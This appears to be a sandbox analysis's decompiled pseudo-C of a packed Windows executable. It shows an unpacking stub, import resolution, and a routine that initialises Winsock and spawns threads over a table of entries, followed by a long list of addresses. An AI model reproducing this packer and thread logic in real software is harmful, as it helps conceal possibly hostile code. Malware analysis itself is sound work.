                                                                                                                                                                                                                                                                            				void* _t170;
                                                                                                                                                                                                                                                                            				unsigned int* _t171;
                                                                                                                                                                                                                                                                            				CHAR* _t173;
                                                                                                                                                                                                                                                                            				signed int _t174;
                                                                                                                                                                                                                                                                            				signed int _t175;
                                                                                                                                                                                                                                                                            				signed int _t177;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t178;
                                                                                                                                                                                                                                                                            				intOrPtr _t179;
                                                                                                                                                                                                                                                                            				DWORD* _t180;
                                                                                                                                                                                                                                                                            				struct HINSTANCE__* _t181;
                                                                                                                                                                                                                                                                            				void* _t184;
                                                                                                                                                                                                                                                                            				signed int _t186;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				asm("pushad");
                                                                                                                                                                                                                                                                            				_t177 = 0x4063000;
                                                                                                                                                                                                                                                                            				_t1 = _t177 - 0x62000; // 0x4001000
                                                                                                                                                                                                                                                                            				_t170 = _t1;
                                                                                                                                                                                                                                                                            				_push(_t170);
                                                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                                                            					_t138 =  *_t177;
                                                                                                                                                                                                                                                                            					_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                            					asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                                                            						if(_t184 < 0) {
                                                                                                                                                                                                                                                                            							_t72 =  *_t177;
                                                                                                                                                                                                                                                                            							_t177 = _t177 + 1;
                                                                                                                                                                                                                                                                            							 *_t170 = _t72;
                                                                                                                                                                                                                                                                            							_t170 = _t170 + 1;
                                                                                                                                                                                                                                                                            							__eflags = _t170;
                                                                                                                                                                                                                                                                            							goto L19;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						_t73 = 1;
                                                                                                                                                                                                                                                                            						while(1) {
                                                                                                                                                                                                                                                                            							_t139 = _t138 + _t138;
                                                                                                                                                                                                                                                                            							if(_t139 == 0) {
                                                                                                                                                                                                                                                                            								_t139 =  *_t177;
                                                                                                                                                                                                                                                                            								_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                            								asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							asm("adc eax, eax");
                                                                                                                                                                                                                                                                            							_t140 = _t139 + _t139;
                                                                                                                                                                                                                                                                            							_t186 = _t140;
                                                                                                                                                                                                                                                                            							if(_t186 >= 0) {
                                                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							L26:
                                                                                                                                                                                                                                                                            							if(_t186 != 0) {
                                                                                                                                                                                                                                                                            								L34:
                                                                                                                                                                                                                                                                            								_t147 = 0;
                                                                                                                                                                                                                                                                            								_t74 = _t73 - 3;
                                                                                                                                                                                                                                                                            								__eflags = _t74;
                                                                                                                                                                                                                                                                            								if(_t74 < 0) {
                                                                                                                                                                                                                                                                            									_t140 = _t140 + _t140;
                                                                                                                                                                                                                                                                            									__eflags = _t140;
                                                                                                                                                                                                                                                                            									if(__eflags == 0) {
                                                                                                                                                                                                                                                                            										_t140 =  *_t177;
                                                                                                                                                                                                                                                                            										_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                            										asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									L39:
                                                                                                                                                                                                                                                                            									if(__eflags < 0) {
                                                                                                                                                                                                                                                                            										L31:
                                                                                                                                                                                                                                                                            										_t138 = _t140 + _t140;
                                                                                                                                                                                                                                                                            										__eflags = _t138;
                                                                                                                                                                                                                                                                            										if(_t138 == 0) {
                                                                                                                                                                                                                                                                            											_t138 =  *_t177;
                                                                                                                                                                                                                                                                            											_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                            											asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										asm("adc ecx, ecx");
                                                                                                                                                                                                                                                                            										L49:
                                                                                                                                                                                                                                                                            										__eflags = _t178 - 0xfffffb00;
                                                                                                                                                                                                                                                                            										asm("adc ecx, 0x2");
                                                                                                                                                                                                                                                                            										_t160 = _t170 + _t178;
                                                                                                                                                                                                                                                                            										__eflags = _t178 - 0xfffffffc;
                                                                                                                                                                                                                                                                            										if(_t178 <= 0xfffffffc) {
                                                                                                                                                                                                                                                                            											do {
                                                                                                                                                                                                                                                                            												_t75 =  *_t160;
                                                                                                                                                                                                                                                                            												_t160 = _t160 + 4;
                                                                                                                                                                                                                                                                            												 *_t170 = _t75;
                                                                                                                                                                                                                                                                            												_t170 = _t170 + 4;
                                                                                                                                                                                                                                                                            												_t147 = _t147 - 4;
                                                                                                                                                                                                                                                                            												__eflags = _t147;
                                                                                                                                                                                                                                                                            											} while (_t147 > 0);
                                                                                                                                                                                                                                                                            											_t170 = _t170 + _t147;
                                                                                                                                                                                                                                                                            											break;
                                                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                                                            											goto L50;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                                                            											L50:
                                                                                                                                                                                                                                                                            											_t76 =  *_t160;
                                                                                                                                                                                                                                                                            											_t160 = _t160 + 1;
                                                                                                                                                                                                                                                                            											 *_t170 = _t76;
                                                                                                                                                                                                                                                                            											_t170 = _t170 + 1;
                                                                                                                                                                                                                                                                            											_t147 = _t147 - 1;
                                                                                                                                                                                                                                                                            											__eflags = _t147;
                                                                                                                                                                                                                                                                            										} while (_t147 != 0);
                                                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_t147 = _t147 + 1;
                                                                                                                                                                                                                                                                            									_t140 = _t140 + _t140;
                                                                                                                                                                                                                                                                            									__eflags = _t140;
                                                                                                                                                                                                                                                                            									if(__eflags == 0) {
                                                                                                                                                                                                                                                                            										_t140 =  *_t177;
                                                                                                                                                                                                                                                                            										_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                            										asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									if(__eflags < 0) {
                                                                                                                                                                                                                                                                            										goto L31;
                                                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                                                            										goto L43;
                                                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                                                            											do {
                                                                                                                                                                                                                                                                            												L43:
                                                                                                                                                                                                                                                                            												_t141 = _t140 + _t140;
                                                                                                                                                                                                                                                                            												__eflags = _t141;
                                                                                                                                                                                                                                                                            												if(_t141 == 0) {
                                                                                                                                                                                                                                                                            													_t141 =  *_t177;
                                                                                                                                                                                                                                                                            													_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                            													asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                                                            												asm("adc ecx, ecx");
                                                                                                                                                                                                                                                                            												_t140 = _t141 + _t141;
                                                                                                                                                                                                                                                                            												__eflags = _t140;
                                                                                                                                                                                                                                                                            											} while (__eflags >= 0);
                                                                                                                                                                                                                                                                            											if(__eflags != 0) {
                                                                                                                                                                                                                                                                            												break;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_t140 =  *_t177;
                                                                                                                                                                                                                                                                            											_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                            											__eflags = _t177;
                                                                                                                                                                                                                                                                            											asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                            										} while (_t177 >= 0);
                                                                                                                                                                                                                                                                            										_t147 = _t147 + 2;
                                                                                                                                                                                                                                                                            										__eflags = _t147;
                                                                                                                                                                                                                                                                            										goto L49;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t78 =  *_t177;
                                                                                                                                                                                                                                                                            								_t177 = _t177 + 1;
                                                                                                                                                                                                                                                                            								_t79 = _t78 ^ 0xffffffff;
                                                                                                                                                                                                                                                                            								__eflags = _t79;
                                                                                                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                                                                                                            									_pop(_t177);
                                                                                                                                                                                                                                                                            									_t171 = _t177;
                                                                                                                                                                                                                                                                            									goto L55;
                                                                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                                                            											L55:
                                                                                                                                                                                                                                                                            											_t80 =  *_t171;
                                                                                                                                                                                                                                                                            											_t171 =  &(_t171[0]);
                                                                                                                                                                                                                                                                            											__eflags = _t80 - 0xe8 - 1;
                                                                                                                                                                                                                                                                            										} while (_t80 - 0xe8 > 1);
                                                                                                                                                                                                                                                                            										__eflags =  *_t171;
                                                                                                                                                                                                                                                                            									} while ( *_t171 != 0);
                                                                                                                                                                                                                                                                            									asm("rol eax, 0x10");
                                                                                                                                                                                                                                                                            									 *_t171 = ( *_t171 >> 8) - _t171 + _t177;
                                                                                                                                                                                                                                                                            									__eflags =  &(_t171[1]);
                                                                                                                                                                                                                                                                            									asm("loop 0xffffffdb");
                                                                                                                                                                                                                                                                            									_t55 = _t177 + 0x89000; // 0x408a000
                                                                                                                                                                                                                                                                            									_t173 = _t55;
                                                                                                                                                                                                                                                                            									while(1) {
                                                                                                                                                                                                                                                                            										L58:
                                                                                                                                                                                                                                                                            										_t90 =  *_t173;
                                                                                                                                                                                                                                                                            										__eflags = _t90;
                                                                                                                                                                                                                                                                            										if(_t90 == 0) {
                                                                                                                                                                                                                                                                            											break;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										_t56 =  &(_t173[4]); // 0x2000
                                                                                                                                                                                                                                                                            										_t146 =  *_t56 + _t177;
                                                                                                                                                                                                                                                                            										_t175 =  &(_t173[8]);
                                                                                                                                                                                                                                                                            										__eflags = _t175;
                                                                                                                                                                                                                                                                            										_t178 = LoadLibraryA(_t90 + _t177 + 0x8c000);
                                                                                                                                                                                                                                                                            										while(1) {
                                                                                                                                                                                                                                                                            											_t173 = _t175 + 1;
                                                                                                                                                                                                                                                                            											__eflags =  *_t175;
                                                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                                                            												goto L58;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											if(__eflags < 0) {
                                                                                                                                                                                                                                                                            												_push( *_t173 & 0x0000ffff);
                                                                                                                                                                                                                                                                            												_t173 =  &(_t173[2]);
                                                                                                                                                                                                                                                                            												__eflags = _t173;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											asm("repne scasb");
                                                                                                                                                                                                                                                                            											_t136 = GetProcAddress(_t178, _t173);
                                                                                                                                                                                                                                                                            											__eflags = _t136;
                                                                                                                                                                                                                                                                            											if(_t136 == 0) {
                                                                                                                                                                                                                                                                            												ExitProcess();
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											 *_t146 = _t136;
                                                                                                                                                                                                                                                                            											_t146 =  &(_t146[1]);
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_t174 =  &(_t173[4]);
                                                                                                                                                                                                                                                                            									__eflags = _t174;
                                                                                                                                                                                                                                                                            									_t63 = _t177 - 4; // 0x4000ffc
                                                                                                                                                                                                                                                                            									_t144 = _t63;
                                                                                                                                                                                                                                                                            									while(1) {
                                                                                                                                                                                                                                                                            										_t174 = _t174 + 1;
                                                                                                                                                                                                                                                                            										_t93 = 0;
                                                                                                                                                                                                                                                                            										__eflags = 0;
                                                                                                                                                                                                                                                                            										if(0 == 0) {
                                                                                                                                                                                                                                                                            											break;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										__eflags = 0 - 0xef;
                                                                                                                                                                                                                                                                            										if(0 > 0xef) {
                                                                                                                                                                                                                                                                            											_t93 =  *_t174;
                                                                                                                                                                                                                                                                            											_t174 = _t174 + 2;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										_t144 = _t144 + _t93;
                                                                                                                                                                                                                                                                            										asm("rol eax, 0x10");
                                                                                                                                                                                                                                                                            										 *_t144 =  *_t144 + _t177;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_t66 = _t177 + 0x8c05c; // 0x74656760
                                                                                                                                                                                                                                                                            									_t179 =  *_t66;
                                                                                                                                                                                                                                                                            									_t67 = _t177 - 0x1000; // 0x4000000
                                                                                                                                                                                                                                                                            									_t170 = _t67;
                                                                                                                                                                                                                                                                            									_t138 = 0x1000;
                                                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                                                            									VirtualProtect(_t170, 0x1000, 4, _t180);
                                                                                                                                                                                                                                                                            									_t68 = _t170 + 0x1df; // 0x40001df
                                                                                                                                                                                                                                                                            									_t95 = _t68;
                                                                                                                                                                                                                                                                            									 *_t95 =  *_t95 & 0x0000007f;
                                                                                                                                                                                                                                                                            									_t69 =  &(_t95[0x28]);
                                                                                                                                                                                                                                                                            									 *_t69 = _t95[0x28] & 0x0000007f;
                                                                                                                                                                                                                                                                            									__eflags =  *_t69;
                                                                                                                                                                                                                                                                            									_pop(_t96);
                                                                                                                                                                                                                                                                            									_push(_t96);
                                                                                                                                                                                                                                                                            									VirtualProtect(_t170, 0x1000, _t96, _t180); // executed
                                                                                                                                                                                                                                                                            									asm("popad");
                                                                                                                                                                                                                                                                            									_t99 =  &_v128;
                                                                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                                                                            										_push(0);
                                                                                                                                                                                                                                                                            										__eflags = _t180 - _t99;
                                                                                                                                                                                                                                                                            									} while (_t180 != _t99);
                                                                                                                                                                                                                                                                            									_t181 = _t180 - 0xffffff80;
                                                                                                                                                                                                                                                                            									_push(_t179);
                                                                                                                                                                                                                                                                            									_t178 = _t181;
                                                                                                                                                                                                                                                                            									_t180 = _t181 - 0x1b8;
                                                                                                                                                                                                                                                                            									_t100 =  &_v280;
                                                                                                                                                                                                                                                                            									_push(_t100);
                                                                                                                                                                                                                                                                            									_push(0x202); // executed
                                                                                                                                                                                                                                                                            									L0400100C(); // executed
                                                                                                                                                                                                                                                                            									__eflags = _t100;
                                                                                                                                                                                                                                                                            									if(_t100 != 0) {
                                                                                                                                                                                                                                                                            										L17:
                                                                                                                                                                                                                                                                            										ExitProcess(0);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									_v408 = 0;
                                                                                                                                                                                                                                                                            									_v412 = 0;
                                                                                                                                                                                                                                                                            									while(1) {
                                                                                                                                                                                                                                                                            										_t101 = E04001490(); // executed
                                                                                                                                                                                                                                                                            										_v416 = _t101;
                                                                                                                                                                                                                                                                            										__eflags = _v416;
                                                                                                                                                                                                                                                                            										if(_v416 <= 0) {
                                                                                                                                                                                                                                                                            											goto L14;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										__eflags = _v416 - 0x2710;
                                                                                                                                                                                                                                                                            										if(_v416 >= 0x2710) {
                                                                                                                                                                                                                                                                            											goto L14;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										 *0x4088c2c = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                                                            										_t103 = E040023E0( *((intOrPtr*)(0x4088c1c + _v408 * 4))); // executed
                                                                                                                                                                                                                                                                            										_t180 =  &(_t180[1]);
                                                                                                                                                                                                                                                                            										_v420 = _t103;
                                                                                                                                                                                                                                                                            										__eflags = _v420;
                                                                                                                                                                                                                                                                            										if(_v420 != 0) {
                                                                                                                                                                                                                                                                            											E04001DC0(_v420, 0x4085600); // executed
                                                                                                                                                                                                                                                                            											_t117 = E04001470(0xc);
                                                                                                                                                                                                                                                                            											_t180 =  &(_t180[3]);
                                                                                                                                                                                                                                                                            											_v440 = _t117;
                                                                                                                                                                                                                                                                            											_v424 = _v440;
                                                                                                                                                                                                                                                                            											 *_v424 =  *(0x4088c1c + _v408 * 4);
                                                                                                                                                                                                                                                                            											 *(_v424 + 4) = _v420;
                                                                                                                                                                                                                                                                            											 *((intOrPtr*)(_v424 + 8)) = 0x4085600;
                                                                                                                                                                                                                                                                            											CreateThread(0, 0, E04001630, _v424, 0, 0); // executed
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										_v428 = 0;
                                                                                                                                                                                                                                                                            										while(1) {
                                                                                                                                                                                                                                                                            											__eflags = _v428 - 3;
                                                                                                                                                                                                                                                                            											if(_v428 >= 3) {
                                                                                                                                                                                                                                                                            												break;
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_t106 = E040023E0( *((intOrPtr*)(0x4088c20 + (_v412 + _v428) * 4))); // executed
                                                                                                                                                                                                                                                                            											_t180 =  &(_t180[1]);
                                                                                                                                                                                                                                                                            											_v432 = _t106;
                                                                                                                                                                                                                                                                            											__eflags = _v432;
                                                                                                                                                                                                                                                                            											if(_v432 != 0) {
                                                                                                                                                                                                                                                                            												E04001DC0(_v432, 0x4085600); // executed
                                                                                                                                                                                                                                                                            												_t111 = E04001470(0xc);
                                                                                                                                                                                                                                                                            												_t180 =  &(_t180[3]);
                                                                                                                                                                                                                                                                            												_v444 = _t111;
                                                                                                                                                                                                                                                                            												_v436 = _v444;
                                                                                                                                                                                                                                                                            												_t164 = _v412 + _v428;
                                                                                                                                                                                                                                                                            												__eflags = _t164;
                                                                                                                                                                                                                                                                            												 *_v436 =  *(0x4088c20 + _t164 * 4);
                                                                                                                                                                                                                                                                            												 *(_v436 + 4) = _v432;
                                                                                                                                                                                                                                                                            												 *((intOrPtr*)(_v436 + 8)) = 0x4085600;
                                                                                                                                                                                                                                                                            												CreateThread(0, 0, E04001630, _v436, 0, 0); // executed
                                                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                                                            											_t108 =  &(_v428->nLength);
                                                                                                                                                                                                                                                                            											__eflags = _t108;
                                                                                                                                                                                                                                                                            											_v428 = _t108;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            										WaitForSingleObject( *0x4088c2c, 0xffffffff);
                                                                                                                                                                                                                                                                            										Sleep(0x9c40);
                                                                                                                                                                                                                                                                            										L04001006();
                                                                                                                                                                                                                                                                            										goto L17;
                                                                                                                                                                                                                                                                            										L14:
                                                                                                                                                                                                                                                                            										Sleep(0x7530);
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_t178 = _t79 >> 1;
                                                                                                                                                                                                                                                                            								goto L39;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							_t140 =  *_t177;
                                                                                                                                                                                                                                                                            							_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                            							asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                            							if(_t177 < 0) {
                                                                                                                                                                                                                                                                            								goto L34;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							L28:
                                                                                                                                                                                                                                                                            							_t73 = _t73 - 1;
                                                                                                                                                                                                                                                                            							_t138 = _t140 + _t140;
                                                                                                                                                                                                                                                                            							if(_t138 == 0) {
                                                                                                                                                                                                                                                                            								_t138 =  *_t177;
                                                                                                                                                                                                                                                                            								_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                            								asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							asm("adc eax, eax");
                                                                                                                                                                                                                                                                            							_t139 = _t138 + _t138;
                                                                                                                                                                                                                                                                            							if(_t139 == 0) {
                                                                                                                                                                                                                                                                            								_t139 =  *_t177;
                                                                                                                                                                                                                                                                            								_t177 = _t177 - 0xfffffffc;
                                                                                                                                                                                                                                                                            								asm("adc ebx, ebx");
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            							asm("adc eax, eax");
                                                                                                                                                                                                                                                                            							_t140 = _t139 + _t139;
                                                                                                                                                                                                                                                                            							_t186 = _t140;
                                                                                                                                                                                                                                                                            							if(_t186 >= 0) {
                                                                                                                                                                                                                                                                            								goto L28;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						L19:
                                                                                                                                                                                                                                                                            						_t138 = _t138 + _t138;
                                                                                                                                                                                                                                                                            						__eflags = _t138;
                                                                                                                                                                                                                                                                            					} while (_t138 != 0);
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}























































                                                                                                                                                                                                                                                                            0x0408bf20
                                                                                                                                                                                                                                                                            0x0408bf21
                                                                                                                                                                                                                                                                            0x0408bf26
                                                                                                                                                                                                                                                                            0x0408bf26
                                                                                                                                                                                                                                                                            0x0408bf2c
                                                                                                                                                                                                                                                                            0x0408bf3a
                                                                                                                                                                                                                                                                            0x0408bf3a
                                                                                                                                                                                                                                                                            0x0408bf3c
                                                                                                                                                                                                                                                                            0x0408bf3f
                                                                                                                                                                                                                                                                            0x0408bf41
                                                                                                                                                                                                                                                                            0x0408bf41
                                                                                                                                                                                                                                                                            0x0408bf30
                                                                                                                                                                                                                                                                            0x0408bf32
                                                                                                                                                                                                                                                                            0x0408bf33
                                                                                                                                                                                                                                                                            0x0408bf35
                                                                                                                                                                                                                                                                            0x0408bf35
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0408bf35
                                                                                                                                                                                                                                                                            0x0408bf43
                                                                                                                                                                                                                                                                            0x0408bf48
                                                                                                                                                                                                                                                                            0x0408bf48
                                                                                                                                                                                                                                                                            0x0408bf4a
                                                                                                                                                                                                                                                                            0x0408bf4c
                                                                                                                                                                                                                                                                            0x0408bf4e
                                                                                                                                                                                                                                                                            0x0408bf51
                                                                                                                                                                                                                                                                            0x0408bf51
                                                                                                                                                                                                                                                                            0x0408bf53
                                                                                                                                                                                                                                                                            0x0408bf55
                                                                                                                                                                                                                                                                            0x0408bf55
                                                                                                                                                                                                                                                                            0x0408bf57
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0408bf59
                                                                                                                                                                                                                                                                            0x0408bf59
                                                                                                                                                                                                                                                                            0x0408bf83
                                                                                                                                                                                                                                                                            0x0408bf83
                                                                                                                                                                                                                                                                            0x0408bf85
                                                                                                                                                                                                                                                                            0x0408bf85
                                                                                                                                                                                                                                                                            0x0408bf88
                                                                                                                                                                                                                                                                            0x0408bf9b
                                                                                                                                                                                                                                                                            0x0408bf9b
                                                                                                                                                                                                                                                                            0x0408bf9d
                                                                                                                                                                                                                                                                            0x0408bf9f
                                                                                                                                                                                                                                                                            0x0408bfa1
                                                                                                                                                                                                                                                                            0x0408bfa4
                                                                                                                                                                                                                                                                            0x0408bfa4
                                                                                                                                                                                                                                                                            0x0408bfa6
                                                                                                                                                                                                                                                                            0x0408bfa6
                                                                                                                                                                                                                                                                            0x0408bf74
                                                                                                                                                                                                                                                                            0x0408bf74
                                                                                                                                                                                                                                                                            0x0408bf74
                                                                                                                                                                                                                                                                            0x0408bf76
                                                                                                                                                                                                                                                                            0x0408bf78
                                                                                                                                                                                                                                                                            0x0408bf7a
                                                                                                                                                                                                                                                                            0x0408bf7d
                                                                                                                                                                                                                                                                            0x0408bf7d
                                                                                                                                                                                                                                                                            0x0408bf7f
                                                                                                                                                                                                                                                                            0x0408bfd5
                                                                                                                                                                                                                                                                            0x0408bfd5
                                                                                                                                                                                                                                                                            0x0408bfdb
                                                                                                                                                                                                                                                                            0x0408bfde
                                                                                                                                                                                                                                                                            0x0408bfe1
                                                                                                                                                                                                                                                                            0x0408bfe4
                                                                                                                                                                                                                                                                            0x0408bff4
                                                                                                                                                                                                                                                                            0x0408bff4
                                                                                                                                                                                                                                                                            0x0408bff6
                                                                                                                                                                                                                                                                            0x0408bff9
                                                                                                                                                                                                                                                                            0x0408bffb
                                                                                                                                                                                                                                                                            0x0408bffe
                                                                                                                                                                                                                                                                            0x0408bffe
                                                                                                                                                                                                                                                                            0x0408bffe
                                                                                                                                                                                                                                                                            0x0408c003
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0408bfe6
                                                                                                                                                                                                                                                                            0x0408bfe6
                                                                                                                                                                                                                                                                            0x0408bfe6
                                                                                                                                                                                                                                                                            0x0408bfe8
                                                                                                                                                                                                                                                                            0x0408bfe9
                                                                                                                                                                                                                                                                            0x0408bfeb
                                                                                                                                                                                                                                                                            0x0408bfec
                                                                                                                                                                                                                                                                            0x0408bfec
                                                                                                                                                                                                                                                                            0x0408bfec
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0408bfef
                                                                                                                                                                                                                                                                            0x0408bfa8
                                                                                                                                                                                                                                                                            0x0408bfa9
                                                                                                                                                                                                                                                                            0x0408bfa9
                                                                                                                                                                                                                                                                            0x0408bfab
                                                                                                                                                                                                                                                                            0x0408bfad
                                                                                                                                                                                                                                                                            0x0408bfaf
                                                                                                                                                                                                                                                                            0x0408bfb2
                                                                                                                                                                                                                                                                            0x0408bfb2
                                                                                                                                                                                                                                                                            0x0408bfb4
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0408bfb6
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0408bfb6
                                                                                                                                                                                                                                                                            0x0408bfb6
                                                                                                                                                                                                                                                                            0x0408bfb6
                                                                                                                                                                                                                                                                            0x0408bfb6
                                                                                                                                                                                                                                                                            0x0408bfb6
                                                                                                                                                                                                                                                                            0x0408bfb8
                                                                                                                                                                                                                                                                            0x0408bfba
                                                                                                                                                                                                                                                                            0x0408bfbc
                                                                                                                                                                                                                                                                            0x0408bfbf
                                                                                                                                                                                                                                                                            0x0408bfbf
                                                                                                                                                                                                                                                                            0x0408bfc1
                                                                                                                                                                                                                                                                            0x0408bfc3
                                                                                                                                                                                                                                                                            0x0408bfc3
                                                                                                                                                                                                                                                                            0x0408bfc3
                                                                                                                                                                                                                                                                            0x0408bfc7
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0408bfc9
                                                                                                                                                                                                                                                                            0x0408bfcb
                                                                                                                                                                                                                                                                            0x0408bfcb
                                                                                                                                                                                                                                                                            0x0408bfce
                                                                                                                                                                                                                                                                            0x0408bfce
                                                                                                                                                                                                                                                                            0x0408bfd2
                                                                                                                                                                                                                                                                            0x0408bfd2
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0408bfd2
                                                                                                                                                                                                                                                                            0x0408bfb4
                                                                                                                                                                                                                                                                            0x0408bf8d
                                                                                                                                                                                                                                                                            0x0408bf8f
                                                                                                                                                                                                                                                                            0x0408bf90
                                                                                                                                                                                                                                                                            0x0408bf90
                                                                                                                                                                                                                                                                            0x0408bf93
                                                                                                                                                                                                                                                                            0x0408c00a
                                                                                                                                                                                                                                                                            0x0408c00b
                                                                                                                                                                                                                                                                            0x0408c00d
                                                                                                                                                                                                                                                                            0x0408c012
                                                                                                                                                                                                                                                                            0x0408c012
                                                                                                                                                                                                                                                                            0x0408c012
                                                                                                                                                                                                                                                                            0x0408c012
                                                                                                                                                                                                                                                                            0x0408c014
                                                                                                                                                                                                                                                                            0x0408c017
                                                                                                                                                                                                                                                                            0x0408c017
                                                                                                                                                                                                                                                                            0x0408c01b
                                                                                                                                                                                                                                                                            0x0408c01b
                                                                                                                                                                                                                                                                            0x0408c029
                                                                                                                                                                                                                                                                            0x0408c035
                                                                                                                                                                                                                                                                            0x0408c037
                                                                                                                                                                                                                                                                            0x0408c03c
                                                                                                                                                                                                                                                                            0x0408c03e
                                                                                                                                                                                                                                                                            0x0408c03e
                                                                                                                                                                                                                                                                            0x0408c044
                                                                                                                                                                                                                                                                            0x0408c044
                                                                                                                                                                                                                                                                            0x0408c046
                                                                                                                                                                                                                                                                            0x0408c046
                                                                                                                                                                                                                                                                            0x0408c048
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0408c04a
                                                                                                                                                                                                                                                                            0x0408c054
                                                                                                                                                                                                                                                                            0x0408c057
                                                                                                                                                                                                                                                                            0x0408c057
                                                                                                                                                                                                                                                                            0x0408c060
                                                                                                                                                                                                                                                                            0x0408c061
                                                                                                                                                                                                                                                                            0x0408c063
                                                                                                                                                                                                                                                                            0x0408c064
                                                                                                                                                                                                                                                                            0x0408c066
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x0408c06a
                                                                                                                                                                                                                                                                            0x0408c070
                                                                                                                                                                                                                                                                            0x0408c071
                                                                                                                                                                                                                                                                            0x0408c071
                                                                                                                                                                                                                                                                            0x0408c072
                                                                                                                                                                                                                                                                            0x0408c075
                                                                                                                                                                                                                                                                            0x0408c07e
                                                                                                                                                                                                                                                                            0x0408c07e
                                                                                                                                                                                                                                                                            0x0408c080
                                                                                                                                                                                                                                                                            0x0408c089
                                                                                                                                                                                                                                                                            0x0408c089
                                                                                                                                                                                                                                                                            0x0408c082
                                                                                                                                                                                                                                                                            0x0408c084
                                                                                                                                                                                                                                                                            0x0408c084
                                                                                                                                                                                                                                                                            0x0408c061
                                                                                                                                                                                                                                                                            0x0408c08f
                                                                                                                                                                                                                                                                            0x0408c08f
                                                                                                                                                                                                                                                                            0x0408c092
                                                                                                                                                                                                                                                                            0x0408c092
